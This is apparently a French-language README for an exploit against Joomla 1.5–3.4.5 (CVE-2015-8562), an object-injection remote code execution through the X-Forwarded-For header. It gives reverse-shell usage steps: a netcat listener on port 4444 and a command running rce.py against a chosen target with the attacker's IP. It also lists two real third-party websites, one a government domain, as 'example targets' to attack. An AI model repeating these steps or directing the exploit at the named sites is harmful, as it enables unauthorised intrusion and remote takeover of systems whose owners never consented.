
Joomla 1.5 - 3.4.5 Injection d'objets RCE via l'en-tête X-Forwarded-For
Exploit : Joomla 1.5 - 3.4.5 Object Injection RCE via l'en-tête X-Forwarded-For :
Date de la vulnérabilité : 17/12/2015
Auteur de l'exploit : anarc0der
Version : Joomla 1.5 à 3.4.5
CVE : CVE-2015-8562
Comment faire :
Ouvrez un terminal et écoutez avec nc : $ nc -lnvp 4444
Ouvrez un autre terminal et exécutez l'exploit :
python3 rce.py --target='cible' --ip='ip' --port=4444
Exemples de cibles PoC (Ne les dérangez pas, d'autres personnes les utilisent comme exemple) :
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/